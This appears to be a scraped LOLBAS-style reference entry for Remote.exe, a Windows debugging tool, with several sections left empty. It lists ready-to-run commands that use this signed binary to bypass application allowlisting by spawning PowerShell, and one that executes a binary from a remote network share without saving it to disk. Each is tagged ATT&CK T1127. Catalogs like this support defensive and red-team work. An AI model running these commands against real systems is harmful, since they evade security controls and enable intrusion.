.. /Remote.exe
Star

AWL bypass
Execute

Debugging tool included with Windows Debugging Tools


Paths:

Resources:
Acknowledgements:

Detection:

AWL bypass

  1. Spawns powershell as a child process of remote.exe

    Remote.exe /s "powershell.exe" anythinghere
    Use case
    Executes a process under a trusted Microsoft signed binary
    Privileges required
    User
    Operating systems
    Windows
    ATT&CK® technique
    T1127

Execute

  1. Spawns powershell as a child process of remote.exe

    Remote.exe /s "powershell.exe" anythinghere
    Use case
    Executes a process under a trusted Microsoft signed binary
    Privileges required
    User
    Operating systems
    Windows
    ATT&CK® technique
    T1127
  2. Run a remote file

    Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
    Use case
    Executing a remote binary without saving file to disk
    Privileges required
    User
    Operating systems
    Windows
    ATT&CK® technique
    T1127